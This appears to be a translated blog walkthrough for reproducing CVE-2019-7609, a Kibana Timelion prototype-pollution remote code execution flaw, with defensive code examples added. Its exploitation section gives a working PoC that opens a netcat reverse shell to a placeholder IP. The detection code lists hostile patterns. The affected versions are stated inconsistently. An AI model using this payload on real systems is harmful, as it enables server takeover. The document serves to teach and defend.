
How to analyze the recurrence of CVE-2019-7609 vulnerability in Kibana remote code execution

2025-03-29 Update. From: SLTechnology News&Howtos (shulou), Internet Technology


Shulou (Shulou.com) 06/01 Report

How do you analyze and reproduce CVE-2019-7609, the Kibana remote code execution vulnerability? Many newcomers are at a loss here, so this article summarizes the cause of the problem and how to deal with it. I hope it helps you work through it.

0x00 Introduction

Kibana is an open-source analysis and visualization platform designed for Elasticsearch. You can use Kibana to search, view and interact with the data stored in Elasticsearch indices, and easily perform advanced data analysis and visualization in the form of charts.

0x01 Vulnerability overview

An attacker can send a request to Kibana's Timelion component that pollutes the JavaScript prototype chain (prototype pollution). Through that pollution the attacker can take over the server and execute arbitrary commands on it.
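As an added illustration (not Kibana's own code, and not from the original article): a minimal "set property by dotted path" helper of the kind that property-assignment functions such as Timelion's `.props()` rely on, showing how a path containing `__proto__` walks out of the target object and writes onto `Object.prototype`, so that a completely unrelated object (for example an options object later handed to `child_process`) suddenly inherits an `env` with a `NODE_OPTIONS` entry. A hardened setter that refuses the dangerous keys and only descends into own properties follows it. The path string and marker value are constructed for the demo.

```javascript
// Added example, not Kibana's code: a naive "set property by dotted path"
// helper in the style of lodash's _.set(), which is the kind of helper that
// lets an argument such as label.__proto__.env.X reach Object.prototype.
function setByPathUnsafe(target, path, value) {
  const keys = path.split('.');
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    // "__proto__" resolves to Object.prototype here, so the walk leaves the
    // target object and starts creating properties on the shared prototype.
    if (cur[keys[i]] === null || typeof cur[keys[i]] !== 'object') {
      cur[keys[i]] = {};
    }
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Hardened variant: reject the keys that walk up the prototype chain and only
// descend into own properties, so inherited objects are never mutated.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function setByPathSafe(target, path, value) {
  const keys = path.split('.');
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) {
      throw new Error(`refusing to set unsafe key "${k}" in path "${path}"`);
    }
  }
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const own = Object.prototype.hasOwnProperty.call(cur, keys[i]);
    if (!own || cur[keys[i]] === null || typeof cur[keys[i]] !== 'object') {
      cur[keys[i]] = {};
    }
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Run the unsafe setter with a constructed path shaped like the one in the
// PoC, observe the effect on an unrelated object, then undo the pollution.
function demonstratePollution() {
  const MARKER = 'POLLUTED-BY-DEMO'; // constructed marker value
  const target = {};
  setByPathUnsafe(target, 'label.__proto__.env.NODE_OPTIONS', MARKER);

  // A fresh object, like the options a caller might pass to child_process
  // without ever setting "env" itself.
  const spawnOptions = {};
  const result = {
    seenNodeOptions: spawnOptions.env ? spawnOptions.env.NODE_OPTIONS : undefined,
    envIsInherited: !Object.prototype.hasOwnProperty.call(spawnOptions, 'env'),
  };

  delete Object.prototype.env; // clean up the global pollution
  result.cleanAfterDelete = ({}).env === undefined;
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demonstratePollution());
  try {
    setByPathSafe({}, 'label.__proto__.env.NODE_OPTIONS', 'x');
  } catch (e) {
    console.log('hardened setter:', e.message);
  }
}
```

The point to take from the demo is that the pollution is invisible to the code that later suffers from it: `spawnOptions` never had `env` assigned, yet reading `spawnOptions.env.NODE_OPTIONS` returns the injected value. Rejecting `__proto__`, `constructor` and `prototype` as path segments, and refusing to descend into inherited properties, closes that route.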

0x02 Affected versions

Kibana < 6.6.1

Kibana < 5.6.15

0x03 Environment setup

It was originally meant to be built with Docker, but because of a network failure it was built directly on Kali.

The affected version is Kibana < 6.6.0. Version 6.5.3 is used for this build, and the virtual machine's memory was raised to more than 4 GB.

1. Elasticsearch installation

A) First download the 6.5.3 tar package from the official website and unpack it.

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz

B) Then just run it directly.

cd elasticsearch-6.5.3
./bin/elasticsearch

Pitfalls here:

i. ES must be started as a non-root user, otherwise the error `can not run elasticsearch as root` is reported.

Solution: start it as a non-root user.

ii. If ES was downloaded and unpacked as root, starting it directly as an ordinary user reports `AccessDeniedException`.

Solution: change the owner of the directory.

elk@kali:~$ sudo chown -R ubuntu ~/elasticsearch-6.5.3/

elk@kali:~$ sudo chgrp -R ubuntu ~/elasticsearch-6.5.3/

iii. ES needs Java. Since I built on Kali, which ships with OpenJDK, the Java installation is not covered here. As for how to install Java, emmm, good question; search Baidu for it.

This article only provides a JDK download from a network disk (reply "JDK" to the official account).

Visit http://127.0.0.1:9200/. If it looks like this, ES has started successfully.

2. Kibana installation

A) Download the compressed package from the official website and unpack it.

wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar -zxvf kibana-6.5.3-linux-x86_64.tar.gz

B) Run it directly.

cd kibana-6.5.3-linux-x86_64
./bin/kibana

The build succeeded. Exciting!

Check the version number: yes, it is vulnerable.

0x04 Vulnerability exploitation

The vulnerability is in Timelion (the name is a bit like Timeline).

Enter the PoC directly. The process and result are shown in the figure:

It really is a case of "cook for half an hour, eat for ten minutes" [facepalm].

Some people may say my payload differs from the author's. I only changed the way the shell is bounced back; for some reason the original author's version didn't work on my Kali, 2333.

PoC:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("nc -e /bin/sh xx.xx.xx.xx 4321"); process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

0x05 Fix

Upgrade Kibana to a version that is no longer affected.
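As an added defender-side example (not from the original article, not Kibana's code): a check that combines the two things an operator wants here, whether a Kibana version falls inside the affected ranges listed under 0x02 (below 6.6.1, below 5.6.15), and whether Timelion expressions collected from request bodies, WAF logs or saved visualizations carry the markers this PoC depends on (`__proto__`, `constructor.prototype`, `NODE_OPTIONS`, `child_process`). The sample records and the `/tmp/x` path are constructed for the example; versions older than 5.x are outside what the article states, so they are reported as unknown rather than guessed.

```javascript
// Added example, not Kibana's code: version check plus a scan of Timelion
// expressions for prototype-pollution indicators.

function parseVersion(v) {
  const parts = v.trim().split('.').map(Number);
  if (parts.length !== 3 || parts.some(n => !Number.isInteger(n) || n < 0)) {
    throw new Error(`unparseable version "${v}"`);
  }
  return parts;
}

function compareVersions(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// true  -> inside a range the article marks as affected (< 6.6.1 or < 5.6.15)
// false -> at or above the fixed release for that line (7.x included)
// null  -> a major version the article does not cover (assumption: unknown)
function isAffectedVersion(version) {
  const [major] = parseVersion(version);
  if (major >= 6) return compareVersions(version, '6.6.1') < 0;
  if (major === 5) return compareVersions(version, '5.6.15') < 0;
  return null;
}

// Strings that have no business in a legitimate Timelion expression.
const SUSPICIOUS = [
  { name: 'proto-key',      re: /__proto__/ },
  { name: 'ctor-prototype', re: /constructor\s*\.\s*prototype/ },
  { name: 'node-options',   re: /NODE_OPTIONS/ },
  { name: 'child-process',  re: /child_process/ },
];

// Scan {source, expression} records; return one finding per matching record.
function scanTimelionExpressions(records) {
  const findings = [];
  for (const rec of records) {
    const hits = SUSPICIOUS.filter(p => p.re.test(rec.expression)).map(p => p.name);
    if (hits.length > 0) findings.push({ source: rec.source, indicators: hits });
  }
  return findings;
}

// Constructed sample records, not real traffic.
const SAMPLE_RECORDS = [
  { source: 'saved-vis:cpu', expression: ".es(*).props(label='cpu').color('red')" },
  { source: 'req:1', expression: ".es(*).props(label.__proto__.env.NODE_OPTIONS='--require /tmp/x')" },
  { source: 'req:2', expression: ".es(q='host:web1').props(label.constructor.prototype.polluted=1)" },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const v of ['6.5.3', '6.6.1', '5.6.14', '7.2.0']) {
    console.log(v, 'affected:', isAffectedVersion(v));
  }
  console.log(JSON.stringify(scanTimelionExpressions(SAMPLE_RECORDS), null, 2));
}
```

The scan is deliberately simple string matching; it is meant as a triage filter over logs or exported saved objects, after which the version check tells you whether the instance that received those expressions needs the upgrade the fix section calls for.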

After reading the above, do you know how to analyze and reproduce CVE-2019-7609, the Kibana remote code execution vulnerability? If you want to learn more skills or read more on the subject, you are welcome to follow the industry information channel. Thank you for reading!

© 2024 shulou.com SLNews company. All rights reserved.